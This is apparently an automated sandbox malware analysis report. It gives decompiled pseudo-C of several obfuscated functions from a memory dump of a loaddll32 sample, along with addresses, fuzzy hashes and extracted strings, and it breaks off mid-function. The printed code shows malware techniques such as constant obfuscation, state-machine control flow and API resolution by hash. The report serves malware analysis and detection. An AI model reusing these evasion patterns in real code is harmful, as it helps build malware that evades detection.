0x02b48651
0x02b48656
0x02b4865b
0x02b48662
0x02b48669
0x02b4866d
0x02b48671
0x02b48678
0x02b4867f
0x02b48686
0x02b4868d
0x02b48690
0x02b48697
0x02b4869e
0x02b486a9
0x02b486aa
0x02b486ad
0x02b486b4
0x02b486bf
0x02b486c2
0x02b486c6
0x02b486cd
0x02b486d9
0x02b486dc
0x02b486e0
0x02b486e7
0x02b486f2
0x02b486f5
0x02b486fc
0x02b48703
0x02b4870e
0x02b48711
0x02b48715
0x02b4871c
0x02b48723
0x02b48727
0x02b4872e
0x02b48735
0x02b4873c
0x02b48743
0x02b4874a
0x02b48751
0x02b48758
0x02b48763
0x02b4876a
0x02b48773
0x02b48777
0x02b48781
0x02b48784
0x02b48787
0x02b48788
0x02b48789
0x02b48791
0x02b487cc
0x00000000
0x02b487fe
0x02b487d0
0x02b487e7
0x02b487f5
0x02b487d2
0x02b487d5
0x02b487d6
0x02b487d7
0x02b487d8
0x02b487d8
0x00000000

Strings

R[+, xrefs: 02B4863A
Y, xrefs: 02B48715
[, xrefs: 02B4871C
v@, xrefs: 02B48758

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: [$R[+$Y$v@
API String ID: 0-1276245682
Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction ID: e14cb2fec3372eae869aaa6e77b5f4cdfd5dddf4b7b564c9fbe2b85a0d253bc2
Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction Fuzzy Hash: 69615472C00209EFCF08CFE4D94AAEEBBB5FB08304F108059E915BA250D7B55A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B49A01, Relevance: 5.1, Strings: 4, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E02B49A01(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t106;
				intOrPtr _t127;
				void* _t128;
				void* _t130;
				intOrPtr _t143;
				void* _t144;
				void* _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				void* _t150;
				void* _t151;

				_push(_a12);
				_t144 = __edx;
				_t128 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t106);
				_v4 = 0x81363a;
				_t151 = _t150 + 0x14;
				_v4 = _v4 | 0xe86970e7;
				_v4 = _v4 ^ 0xe8e8406c;
				_t145 = 0;
				_v8 = 0xe36f3c;
				_t130 = 0x9d12efa;
				_t10 =  &_v8; // 0xe36f3c
				_t146 = 0x18;
				_v8 =  *_t10 / _t146;
				_v8 = _v8 ^ 0x000ac4f9;
				_v28 = 0x86ae71;
				_v28 = _v28 + 0x307d;
				_v28 = _v28 ^ 0x3f5774ce;
				_v28 = _v28 ^ 0x3fdb82be;
				_v12 = 0xd5596e;
				_t147 = 0x24;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0x618cdae6;
				_v16 = 0xa0cb2;
				_v16 = _v16 + 0x618a;
				_v16 = _v16 + 0xfb99;
				_v16 = _v16 ^ 0x0001ef53;
				_v20 = 0xb65aa2;
				_v20 = _v20 | 0x7ee7663c;
				_v20 = _v20 + 0xffff14a1;
				_v20 = _v20 ^ 0x7ef81620;
				_v24 = 0x69cefc;
				_v24 = _v24 * 5;
				_v24 = _v24 ^ 0x0216a415;
				_v44 = 0xc8ca94;
				_v44 = _v44 * 0x55;
				_v44 = _v44 << 0xc;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x2d01fb93;
				_v32 = 0xaa7e08;
				_v32 = _v32 << 6;
				_v32 = _v32 / _t147;
				_v32 = _v32 | 0xdbfc63c4;
				_v32 = _v32 ^ 0xdbf76cca;
				_v36 = 0x12ed95;
				_v36 = _v36 + 0xd11f;
				_t148 = 0x64;
				_v36 = _v36 / _t148;
				_v36 = _v36 ^ 0x700cfa35;
				_v36 = _v36 ^ 0x700e1ad8;
				_v40 = 0xf66f66;
				_v40 = _v40 + 0xffff4d0b;
				_v40 = _v40 + 0xffffdddb;
				_v40 = _v40 + 0xffff052c;
				_v40 = _v40 ^ 0x00f507b6;
				do {
					while(_t130 != 0x348ce2d) {
						if(_t130 == 0x5264aba) {
							_t143 =  *0x2b56228; // 0x0
							E02B52B09(_v32, _t143, _v36, _v40);
						} else {
							if(_t130 == 0x5e19b60) {
								if(E02B53EE9() != 0) {
									_t130 = 0x348ce2d;
									continue;
								}
							} else {
								if(_t130 == 0x8610059) {
									E02B3DCA0();
									_t130 = 0x5264aba;
									continue;
								} else {
									if(_t130 != 0x9d12efa) {
										goto L12;
									} else {
										_push(_t130);
										_push(_t130);
										_t127 = E02B3C5D8(0x30);
										_t151 = _t151 + 0xc;
										 *0x2b56228 = _t127;
										_t130 = 0x5e19b60;
										continue;
									}
								}
							}
						}
						L15:
						return _t145;
					}
					_t145 = E02B33271(_v16, _t144, _v20, _t128, _v24, _v44);
					_t151 = _t151 + 0x10;
					if(_t145 == 0) {
						_t130 = 0x8610059;
						goto L12;
					}
					goto L15;
					L12:
				} while (_t130 != 0xbdf1695);
				goto L15;
			}

0x02b49a08
0x02b49a0c
0x02b49a0e
0x02b49a10
0x02b49a14
0x02b49a18
0x02b49a19
0x02b49a1a
0x02b49a1f
0x02b49a27
0x02b49a2a
0x02b49a34
0x02b49a3c
0x02b49a3e
0x02b49a46
0x02b49a4b
0x02b49a51
0x02b49a56
0x02b49a5c
0x02b49a64
0x02b49a6c
0x02b49a74
0x02b49a7c
0x02b49a84
0x02b49a91
0x02b49a94
0x02b49a98
0x02b49aa0
0x02b49aa8
0x02b49ab0
0x02b49ab8
0x02b49ac0
0x02b49ac8
0x02b49ad0
0x02b49ad8
0x02b49ae0
0x02b49af5
0x02b49af9
0x02b49b01
0x02b49b0e
0x02b49b12
0x02b49b17
0x02b49b1c
0x02b49b24
0x02b49b2c
0x02b49b39
0x02b49b3d
0x02b49b45
0x02b49b4d
0x02b49b55
0x02b49b61
0x02b49b69
0x02b49b6d
0x02b49b75
0x02b49b7d
0x02b49b85
0x02b49b8d
0x02b49b95
0x02b49b9d
0x02b49ba5
0x02b49ba5
0x02b49baf
0x02b49c4a
0x02b49c54
0x02b49bb5
0x02b49bbb
0x02b49c08
0x02b49c0a
0x00000000
0x02b49c0a
0x02b49bbd
0x02b49bc3
0x02b49bf5
0x02b49bfa
0x00000000
0x02b49bc5
0x02b49bcb
0x00000000
0x02b49bcd
0x02b49bdd
0x02b49bde
0x02b49be1
0x02b49be6
0x02b49be9
0x02b49bee
0x00000000
0x02b49bee
0x02b49bcb
0x02b49bc3
0x02b49bbb
0x02b49c5c
0x02b49c64
0x02b49c64
0x02b49c26
0x02b49c28
0x02b49c2d
0x02b49c2f
0x00000000
0x02b49c2f
0x00000000
0x02b49c34
0x02b49c34
0x00000000

Strings

}0, xrefs: 02B49A6C
<f~, xrefs: 02B49AC8
l@, xrefs: 02B49A34
<o, xrefs: 02B49A4B

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <f~$<o$l@$}0
API String ID: 0-758050912
Opcode ID: ea80a37ac3be1ecdcdfec642a4acda394de49e6b0a52a6671fe9acbfff31efc7
Instruction ID: 7d0696cf7334031c33d71d002a4cd1498b92c66724f88995ad27b0f4b45e0dab
Opcode Fuzzy Hash: ea80a37ac3be1ecdcdfec642a4acda394de49e6b0a52a6671fe9acbfff31efc7
Instruction Fuzzy Hash: 2C518471508340AFC748CF62C88982FBBE1EFC8368F50595DF69696261D7B18A48DF87

Uniqueness

Uniqueness Score: -1.00%

Function 02B32194, Relevance: 5.1, Strings: 4, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E02B32194(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t67;
				intOrPtr* _t77;
				signed int _t80;
				signed int _t81;
				void* _t88;

				_t88 = __ecx;
				E02B4FE29(_t67);
				_v28 = 0x23b662;
				_v24 = 0;
				_v12 = 0x5a4623;
				_v12 = _v12 + 0x2367;
				_v12 = _v12 ^ 0x11a2f25e;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x3f16c1ec;
				_v20 = 0x4a1b7a;
				_v20 = _v20 ^ 0x2a8c83f5;
				_v20 = _v20 ^ 0x0b06bd0c;
				_v20 = _v20 ^ 0x21c6558f;
				_v8 = 0x75635a;
				_v8 = _v8 >> 0xc;
				_t80 = 0x19;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x5f69645e;
				_v8 = _v8 ^ 0x5f68d09e;
				_v16 = 0xc2b090;
				_v16 = _v16 + 0xffff85c8;
				_t81 = 0x7c;
				_v16 = _v16 / _t81;
				_v16 = _v16 ^ 0x000d5e79;
				_t77 = E02B3EB52(_t81, _t81, 0x525cea78, 0xe3, 0x4be980c1);
				return  *_t77(_a56, _a36, _a48, 0, 0, _a16, _a60, _t88, _a44, _a52, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44, _a48, _a52, _a56, _a60);
			}

0x02b321a1
0x02b321cb
0x02b321d0
0x02b321da
0x02b321df
0x02b321e6
0x02b321ed
0x02b321f4
0x02b321f8
0x02b321ff
0x02b32206
0x02b3220d
0x02b32214
0x02b3221b
0x02b32222
0x02b3222b
0x02b32230
0x02b32235
0x02b3223c
0x02b32243
0x02b3224a
0x02b32254
0x02b3225c
0x02b3225f
0x02b3227e
0x02b322a5

Strings

#FZ, xrefs: 02B321DF
y^, xrefs: 02B3225F
g#, xrefs: 02B321E6
^di_, xrefs: 02B32235

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #FZ$^di_$g#$y^
API String ID: 0-3614166594
Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction ID: e6642a40678788e0e5cdab8b24a150190897b114d1d3d29d0a2329cccced41c3
Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction Fuzzy Hash: 3031F572800208FBCF05DFA5DC498DEBFB6FF89304F508159FA1466120D3B68A60AF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B48FAE, Relevance: 4.1, Strings: 3, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E02B48FAE(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t364;
				void* _t367;
				void* _t375;
				void* _t379;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t420;
				intOrPtr* _t425;
				void* _t429;
				signed int* _t430;

				_t430 =  &_v164;
				_v44 = 0xc56d85;
				_v44 = _v44 | 0x6747c0a0;
				_v44 = _v44 ^ 0x67c7eda5;
				_v148 = 0xd0221b;
				_v148 = _v148 + 0xb86b;
				_t425 = __ecx;
				_t429 = 0;
				_t382 = 0x2d;
				_v4 = __ecx;
				_t379 = 0x771143;
				_v148 = _v148 / _t382;
				_v148 = _v148 * 0x66;
				_v148 = _v148 ^ 0x01d966be;
				_v152 = 0x268288;
				_v152 = _v152 + 0xc42a;
				_v152 = _v152 * 0x1a;
				_v152 = _v152 | 0x9e13f09a;
				_v152 = _v152 ^ 0x9ffffe9e;
				_v84 = 0x856365;
				_v84 = _v84 + 0xffff26a7;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0848a0c0;
				_v72 = 0xf332ed;
				_v72 = _v72 ^ 0xef6a6dd6;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x03be657c;
				_v120 = 0xd51e66;
				_v120 = _v120 | 0x823b6191;
				_v120 = _v120 + 0xffffb8fb;
				_v120 = _v120 + 0xaa7;
				_v120 = _v120 ^ 0x82fd9684;
				_v108 = 0xd10da2;
				_v108 = _v108 + 0xffff1c26;
				_v108 = _v108 + 0xffff12ce;
				_v108 = _v108 ^ 0x00cc3eec;
				_v76 = 0x14aa13;
				_v76 = _v76 ^ 0xa7d92c4a;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0x000074b4;
				_v92 = 0x17a820;
				_v92 = _v92 ^ 0x3a93bf92;
				_v92 = _v92 | 0x1a458659;
				_v92 = _v92 ^ 0x3acb9ffe;
				_v144 = 0x9f1ca1;
				_v144 = _v144 << 3;
				_v144 = _v144 | 0x88246970;
				_v144 = _v144 + 0x8e62;
				_v144 = _v144 ^ 0x8cf667c6;
				_v52 = 0x8da33b;
				_v52 = _v52 >> 8;
				_v52 = _v52 ^ 0x00059428;
				_v96 = 0x1abb08;
				_v96 = _v96 ^ 0x6c742edf;
				_v96 = _v96 + 0xffff01f6;
				_v96 = _v96 ^ 0x6c6614ef;
				_v112 = 0x9f0f81;
				_v112 = _v112 * 0x6a;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x083a0fed;
				_v156 = 0x609a24;
				_v156 = _v156 + 0xffff683f;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0xcd31;
				_v156 = _v156 ^ 0x0c079756;
				_v164 = 0xe5cc1d;
				_v164 = _v164 << 7;
				_v164 = _v164 | 0x9a492847;
				_v164 = _v164 * 0x78;
				_v164 = _v164 ^ 0xa012b17f;
				_v128 = 0x53ee3c;
				_t120 =  &_v128; // 0x53ee3c
				_t383 = 0x29;
				_v128 =  *_t120 / _t383;
				_v128 = _v128 ^ 0x929088a5;
				_v128 = _v128 + 0xa7c3;
				_v128 = _v128 ^ 0x929242c1;
				_v140 = 0x5f30f1;
				_v140 = _v140 | 0xd1491927;
				_t384 = 0x7c;
				_v140 = _v140 / _t384;
				_t385 = 0x58;
				_v140 = _v140 / _t385;
				_v140 = _v140 ^ 0x000295f0;
				_v88 = 0x55e174;
				_v88 = _v88 ^ 0x7dd6f036;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x000a8d63;
				_v28 = 0xb452eb;
				_v28 = _v28 + 0xffff5322;
				_v28 = _v28 ^ 0x00ba2bf5;
				_v36 = 0x42507a;
				_v36 = _v36 | 0xf1dc1e20;
				_v36 = _v36 ^ 0xf1d9c77b;
				_v80 = 0xc31b4e;
				_v80 = _v80 ^ 0xd2ac5232;
				_t386 = 0x43;
				_v80 = _v80 / _t386;
				_v80 = _v80 ^ 0x03298e6e;
				_v124 = 0x46c8cc;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 5;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x1b2fd4b6;
				_v132 = 0x745205;
				_v132 = _v132 ^ 0x1862e0ae;
				_v132 = _v132 << 5;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x0007d289;
				_v20 = 0x713f0f;
				_v20 = _v20 ^ 0x61c76558;
				_v20 = _v20 ^ 0x61bb476a;
				_v48 = 0x3998c0;
				_v48 = _v48 | 0xd3555304;
				_v48 = _v48 ^ 0xd37b9815;
				_v160 = 0xe5ad6c;
				_v160 = _v160 * 0x3a;
				_v160 = _v160 | 0x660736ab;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xefd0e6e0;
				_v60 = 0x9fc9f5;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x000a96ad;
				_v16 = 0xa888b5;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x4445c6cc;
				_v104 = 0xee35af;
				_v104 = _v104 ^ 0xea83652e;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x536d6a1f;
				_v12 = 0x6066b2;
				_v12 = _v12 + 0xb1d6;
				_v12 = _v12 ^ 0x00605003;
				_v40 = 0x2dba20;
				_v40 = _v40 * 0x73;
				_v40 = _v40 ^ 0x1485b41c;
				_v136 = 0xfcb12d;
				_v136 = _v136 << 1;
				_v136 = _v136 + 0xaead;
				_v136 = _v136 + 0xffffaecb;
				_v136 = _v136 ^ 0x01ffed69;
				_v24 = 0x751c6a;
				_t387 = 0x7d;
				_v24 = _v24 / _t387;
				_v24 = _v24 ^ 0x0002b143;
				_v68 = 0x69a6e2;
				_v68 = _v68 + 0xaa03;
				_v68 = _v68 ^ 0x73662bb1;
				_v68 = _v68 ^ 0x730f0150;
				_v100 = 0xcb496d;
				_v100 = _v100 >> 1;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0008f604;
				_v56 = 0x2cd04e;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x0162f7e8;
				_v32 = 0xb2ca4d;
				_v32 = _v32 + 0x32b9;
				_v32 = _v32 ^ 0x00b4bcfb;
				_v64 = 0x655992;
				_v64 = _v64 >> 5;
				_v64 = _v64 | 0x6342cf71;
				_v64 = _v64 ^ 0x634627b6;
				_v116 = 0x833545;
				_v116 = _v116 * 0x75;
				_v116 = _v116 + 0xeb9e;
				_v116 = _v116 * 0x6f;
				_v116 = _v116 ^ 0x00ae15cd;
				while(1) {
					L1:
					_t364 = 0x917a7c8;
					do {
						if(_t379 == 0x771143) {
							_t379 = 0x6e440a7;
							goto L9;
						} else {
							if(_t379 == 0x1a710aa) {
								E02B3F7FE(_v64, _v8, _v116, _v72);
							} else {
								if(_t379 == 0x6e440a7) {
									_push(_v92);
									_push(_v76);
									_push(_v108);
									_t367 = E02B4E1F8(0x2b314c8, _v120, __eflags);
									_push(_v112);
									_push(_v96);
									_push(_v52);
									__eflags = E02B3738A(_v156, _t367, _v164, _v44,  &_v8, E02B4E1F8(0x2b31318, _v144, __eflags), _v128) - _v148;
									_t379 =  ==  ? 0x917a7c8 : 0x14ee4a5;
									E02B4FECB(_t367, _v140, _v88, _v28, _v36);
									E02B4FECB(_t368, _v80, _v124, _v132, _v20);
									_t425 = _v4;
									_t430 =  &(_t430[0x11]);
									_t364 = 0x917a7c8;
									goto L9;
								} else {
									_t436 = _t379 - _t364;
									if(_t379 != _t364) {
										goto L9;
									} else {
										_push(_v16);
										_push(_v60);
										_push(_v160);
										_t375 = E02B4E1F8(0x2b31368, _v48, _t436);
										_t420 =  *0x2b56224; // 0x0
										E02B3BC32( *((intOrPtr*)(_t425 + 4)), _t420 + 0x48, _v152, _v104, _v12, _t375,  *_t425, _v40, _v136, _v8, 0x2b31368, _v24);
										_t379 = 0x1a710aa;
										_t429 =  ==  ? 1 : _t429;
										E02B4FECB(_t375, _v68, _v100, _v56, _v32);
										_t430 =  &(_t430[0x10]);
										goto L1;
									}
								}
							}
						}
						L12:
						return _t429;
						L9:
						__eflags = _t379 - 0x14ee4a5;
					} while (__eflags != 0);
					goto L12;
				}
			}

0x02b48fae
0x02b48fb4
0x02b48fbe
0x02b48fc6
0x02b48fce
0x02b48fd6
0x02b48fe6
0x02b48fe8
0x02b48fec
0x02b48fef
0x02b48ff6
0x02b48ffb
0x02b49004
0x02b49008
0x02b49010
0x02b49018
0x02b49025
0x02b49029
0x02b49031
0x02b49039
0x02b49041
0x02b49049
0x02b4904e
0x02b49056
0x02b4905e
0x02b49066
0x02b4906b
0x02b49073
0x02b4907b
0x02b49083
0x02b4908b
0x02b49093
0x02b4909b
0x02b490a3
0x02b490ab
0x02b490b3
0x02b490bb
0x02b490c3
0x02b490cb
0x02b490d0
0x02b490d8
0x02b490e0
0x02b490e8
0x02b490f0
0x02b490f8
0x02b49100
0x02b49105
0x02b4910d
0x02b49115
0x02b4911d
0x02b49128
0x02b49130
0x02b4913b
0x02b49143
0x02b4914b
0x02b49153
0x02b4915b
0x02b49168
0x02b4916c
0x02b49171
0x02b49179
0x02b49181
0x02b49189
0x02b4918e
0x02b49196
0x02b4919e
0x02b491a6
0x02b491ab
0x02b491b8
0x02b491bc
0x02b491c4
0x02b491ce
0x02b491d4
0x02b491d9
0x02b491df
0x02b491e7
0x02b491ef
0x02b491f7
0x02b491ff
0x02b4920b
0x02b49210
0x02b4921a
0x02b4921f
0x02b49225
0x02b4922d
0x02b49235
0x02b4923d
0x02b49242
0x02b4924a
0x02b49255
0x02b49260
0x02b4926b
0x02b49276
0x02b49281
0x02b4928c
0x02b49294
0x02b492a0
0x02b492a3
0x02b492a7
0x02b492af
0x02b492b7
0x02b492bc
0x02b492c1
0x02b492c6
0x02b492ce
0x02b492d6
0x02b492de
0x02b492e3
0x02b492e8
0x02b492f0
0x02b492fb
0x02b49306
0x02b49311
0x02b4931c
0x02b49327
0x02b49332
0x02b4933f
0x02b49343
0x02b4934b
0x02b49350
0x02b49358
0x02b49360
0x02b49365
0x02b4936d
0x02b49378
0x02b49380
0x02b4938b
0x02b49393
0x02b4939b
0x02b493a0
0x02b493a8
0x02b493b3
0x02b493be
0x02b493c9
0x02b493dc
0x02b493e5
0x02b493f0
0x02b493f8
0x02b493fc
0x02b49404
0x02b4940c
0x02b49414
0x02b49428
0x02b4942b
0x02b49432
0x02b4943d
0x02b49445
0x02b4944d
0x02b49455
0x02b4945d
0x02b49465
0x02b49469
0x02b4946e
0x02b49476
0x02b4947e
0x02b49483
0x02b4948b
0x02b49496
0x02b494a1
0x02b494ac
0x02b494b4
0x02b494b9
0x02b494c1
0x02b494c9
0x02b494d6
0x02b494da
0x02b494e7
0x02b494eb
0x02b494f3
0x02b494f3
0x02b494f3
0x02b494f8
0x02b494fe
0x02b49688
0x00000000
0x02b49504
0x02b4950a
0x02b496ae
0x02b49510
0x02b49516
0x02b495c7
0x02b495d0
0x02b495d4
0x02b495dc
0x02b495e1
0x02b495ec
0x02b495f0
0x02b49630
0x02b49647
0x02b49655
0x02b49672
0x02b49677
0x02b4967e
0x02b49681
0x00000000
0x02b4951c
0x02b4951c
0x02b4951e
0x00000000
0x02b49524
0x02b49524
0x02b49530
0x02b49534
0x02b4953f
0x02b49575
0x02b49581
0x02b4959b
0x02b495a7
0x02b495ba
0x02b495bf
0x00000000
0x02b495bf
0x02b4951e
0x02b49516
0x02b4950a
0x02b496b7
0x02b496c1
0x02b4968d
0x02b4968d
0x02b4968d
0x00000000
0x02b49699

Strings

tU, xrefs: 02B4922D
zPB, xrefs: 02B4926B
<S, xrefs: 02B491CE

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <S$tU$zPB
API String ID: 0-3909742637
Opcode ID: f49af071e4a2c37a9e0c16dd2d9cd2232b2584689558fed57317fe8a813721c8
Instruction ID: 4b6113cfbe2440471ea438ff404428172018c7ac0b0858aa5771a0eccacb1ee2
Opcode Fuzzy Hash: f49af071e4a2c37a9e0c16dd2d9cd2232b2584689558fed57317fe8a813721c8
Instruction Fuzzy Hash: 61F10E715083809FD768CF21C58AA4BFBF2FBC5748F50891DE6AA86260D7B18909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B49DF5, Relevance: 4.0, Strings: 3, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B49DF5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t196;
				void* _t219;
				char _t222;
				void* _t227;
				char* _t235;
				void* _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int* _t272;

				_push(_a12);
				_t259 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t196);
				_v164 = 0xe41f8c;
				_t272 =  &(( &_v208)[5]);
				_v164 = _v164 << 0x10;
				_t227 = 0xb5c0777;
				_t260 = 0x69;
				_v164 = _v164 * 0x11;
				_v164 = _v164 ^ 0x18467706;
				_v180 = 0xeb334b;
				_v180 = _v180 ^ 0xb42ec71e;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0xfa2f170d;
				_v204 = 0x9173d0;
				_v204 = _v204 / _t260;
				_v204 = _v204 + 0xc6b3;
				_t261 = 0x22;
				_v204 = _v204 / _t261;
				_v204 = _v204 ^ 0x000ee5cc;
				_v176 = 0x7c8d5;
				_v176 = _v176 | 0x723fe192;
				_v176 = _v176 + 0x4897;
				_v176 = _v176 ^ 0x724c9210;
				_v184 = 0xa283a5;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x00039d39;
				_v172 = 0xfcf8f5;
				_t262 = 0x68;
				_v172 = _v172 / _t262;
				_t263 = 0x12;
				_v172 = _v172 / _t263;
				_v172 = _v172 ^ 0x0008ec4c;
				_v196 = 0x6ce5d4;
				_v196 = _v196 + 0x3b25;
				_v196 = _v196 ^ 0x77f3da3b;
				_v196 = _v196 + 0xa9d5;
				_v196 = _v196 ^ 0x779af0ad;
				_v156 = 0x25f26f;
				_t264 = 0x4f;
				_v156 = _v156 / _t264;
				_v156 = _v156 ^ 0x000ca3cb;
				_v188 = 0x55ff28;
				_t265 = 7;
				_v188 = _v188 / _t265;
				_t266 = 0x50;
				_v188 = _v188 / _t266;
				_v188 = _v188 ^ 0x000cd773;
				_v148 = 0x9faf35;
				_v148 = _v148 >> 0xb;
				_v148 = _v148 ^ 0x00041a0d;
				_v144 = 0xb9aa79;
				_v144 = _v144 + 0xffff300b;
				_v144 = _v144 ^ 0x00b65e72;
				_v152 = 0xe2e022;
				_v152 = _v152 << 0xa;
				_v152 = _v152 ^ 0x8b87efd2;
				_v140 = 0x6f845f;
				_v140 = _v140 ^ 0xc6ebfb93;
				_v140 = _v140 ^ 0xc684fc76;
				_v208 = 0x15bd2c;
				_v208 = _v208 + 0xca24;
				_v208 = _v208 + 0xaf45;
				_v208 = _v208 >> 5;
				_v208 = _v208 ^ 0x000727e8;
				_v136 = 0x982476;
				_v136 = _v136 | 0xd92aa943;
				_v136 = _v136 ^ 0xd9b01548;
				_v160 = 0x20104f;
				_v160 = _v160 ^ 0xef20d220;
				_t267 = 0x2e;
				_v160 = _v160 * 0x21;
				_v160 = _v160 ^ 0xcf1410de;
				_v168 = 0x2e9b6b;
				_v168 = _v168 + 0xffff5c1c;
				_v168 = _v168 * 0x26;
				_v168 = _v168 ^ 0x06dc91dd;
				_v192 = 0xd01025;
				_v192 = _v192 | 0x8f03462b;
				_v192 = _v192 + 0xffffdaa2;
				_v192 = _v192 << 2;
				_v192 = _v192 ^ 0x3f4450ba;
				_v200 = 0xfd9656;
				_v200 = _v200 | 0x00ba0155;
				_v200 = _v200 / _t267;
				_t268 = 0x6a;
				_v200 = _v200 / _t268;
				_v200 = _v200 ^ 0x00073cbf;
				while(_t227 != 0x9fc41a2) {
					if(_t227 == 0xa1171ea) {
						_v132 = 0x80;
						_t222 = E02B496C2(_v164, _v180, _v204, _v176,  &_v128,  &_v132);
						_t272 =  &(_t272[4]);
						_t227 = 0xabd7dae;
						continue;
					} else {
						if(_t227 == 0xabd7dae) {
							__eflags = _v128;
							_t235 =  &_v128;
